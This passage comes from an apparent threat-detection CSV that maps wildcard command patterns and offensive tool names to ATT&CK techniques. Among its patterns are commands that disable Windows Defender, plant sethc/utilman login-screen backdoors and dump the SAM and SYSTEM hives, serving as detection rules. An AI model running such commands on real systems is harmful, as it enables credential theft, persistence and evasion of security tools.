T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveNTDLL.cpp*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.exe*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.sln*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNTDLL.vcxproj*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*ReflectiveNtdll-main*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*RefleXXion*ntdll.dll*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion.sln*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. 
In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-DLL*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-EXE*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*RefleXXion-main*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z"
+"*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","7","7","N/A","N/A","N/A","N/A"
+"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*","greyware_tool_keyword","reg","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 -
T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*","greyware_tool_keyword","reg","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 0*","greyware_tool_keyword","reg","Anti forensic - Disabling Prefetch","T1215 - T1562.001 - T1037","TA0008","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*","greyware_tool_keyword","reg","Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","7","N/A","N/A","N/A","N/A"
+"*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*","greyware_tool_keyword","reg","Disable Windows Defender Security Center","T1562.001 -
T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*REG ADD *igfxCUIService*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new + Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" +"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *","greyware_tool_keyword","reg","Disable Cortex: Change the DLL to a random value","T1547.001 - T1055.001 - T1055.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A" +"*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - 
T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg query hkcu\software\*\putty\session*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable).
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","N/A","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*reg query hklm\software\OpenSSH*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query hklm\software\OpenSSH\Agent*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query hklm\software\realvnc*","greyware_tool_keyword","reg","Query
the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query hklm\software\realvnc\Allusers*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query hklm\software\realvnc\Allusers\vncserver*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query hklm\software\realvnc\vncserver*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable).
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable).
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*reg save hklm\sam *.dat*","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\sam to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*reg save HKLM\SAM c:*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg save hklm\sam sam*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts.
By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg save hklm\system *.dat*","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\system to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*reg save HKLM\SYSTEM c:*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg save hklm\system system*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts.
By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*reg.exe save HKLM\SAM sam_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*reg.exe save hklm\sam*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*reg.exe save HKLM\SECURITY security_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*reg.exe save hklm\security*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*reg.exe save HKLM\SYSTEM sys*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control
server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*reg.exe save hklm\system*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*reg.py *@* save -keyName 'HKLM\SAM*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*reg.py *@* save -keyName 'HKLM\SECURITY*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*reg.py *@* save -keyName 'HKLM\SYSTEM*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*reGeorg-master*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
